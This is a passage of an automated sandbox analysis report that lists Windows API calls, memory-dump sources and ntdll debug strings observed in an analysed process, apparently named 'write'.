                                                                      • API String ID: 2234796835-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateProcessInternalW.KERNELBASE(02FD08D1,02FD08F9,02FD06D1,00000000,02FD76E3,00000010,02FD08F9,?,?,00000044,02FD08F9,00000010,02FD76E3,00000000,02FD06D1,02FD08F9), ref: 02FE7DB3
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateInternalProcess
                                                                      • String ID:
                                                                      • API String ID: 2186235152-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02FC92B5
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateThread
                                                                      • String ID:
                                                                      • API String ID: 2422867632-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,03D333D0,00000007,00000000,00000004,00000000,02FD36F5,000000F4,?,?,?,?,?), ref: 02FE7CFC
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID:
                                                                      • API String ID: 3298025750-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(02FD1039,?,02FE47FB,02FD1039,02FE4047,02FE47FB,?,02FD1039,02FE4047,00001000,?,?,02FE9530), ref: 02FE7CAC
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?), ref: 02FD774C
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • PostThreadMessageW.USER32(?,00000111), ref: 02FD0497
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID:
                                                                      • API String ID: 1836367815-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,02FD1320,02FE6767,02FE4047,?), ref: 02FD7563
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorMode
                                                                      • String ID:
                                                                      • API String ID: 2340568224-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,02FD1320,02FE6767,02FE4047,?), ref: 02FD7563
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorMode
                                                                      • String ID:
                                                                      • API String ID: 2340568224-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05234460
                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 05234592
                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 05234507
                                                                      • ExecuteOptions, xrefs: 052344AB
                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0523454D
                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05234530
                                                                      • Execute=1, xrefs: 0523451E
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                      • API String ID: 0-484625025
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $$@
                                                                      • API String ID: 0-1194432280
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%